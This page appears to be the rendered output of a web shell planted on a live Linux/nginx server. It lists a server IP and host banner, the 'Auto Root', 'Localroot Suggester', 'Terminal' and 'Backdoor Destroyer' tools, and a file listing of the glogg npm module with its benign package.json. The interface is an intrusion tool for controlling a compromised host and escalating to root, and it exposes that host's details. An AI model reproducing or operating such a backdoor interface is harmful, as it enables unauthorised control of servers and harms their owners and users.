Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.21.33.186
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
glogg /
Delete
Unzip
Name
Size
Permission
Date
Action
LICENSE
1.13
KB
-rw-rw-r--
2022-08-30 11:49
README.md
3.37
KB
-rw-rw-r--
2022-08-30 11:49
index.js
541
B
-rw-rw-r--
2022-08-30 11:49
package.json
944
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
{ "name": "glogg", "version": "1.0.2", "description": "Global logging utility", "author": "Gulp Team <team@gulpjs.com> (http://gulpjs.com/)", "contributors": [ "Blaine Bublitz <blaine.bublitz@gmail.com>" ], "repository": "gulpjs/glogg", "license": "MIT", "engines": { "node": ">= 0.10" }, "main": "index.js", "files": [ "LICENSE", "index.js" ], "scripts": { "lint": "eslint .", "pretest": "npm run lint", "test": "mocha --async-only", "cover": "istanbul cover _mocha --report lcovonly", "coveralls": "npm run cover && istanbul-coveralls" }, "dependencies": { "sparkles": "^1.0.0" }, "devDependencies": { "eslint": "^2.13.0", "eslint-config-gulp": "^3.0.1", "expect": "^1.20.2", "istanbul": "^0.4.3", "istanbul-coveralls": "^1.0.3", "mocha": "^3.5.3" }, "keywords": [ "global", "log", "logger", "logging", "shared" ] }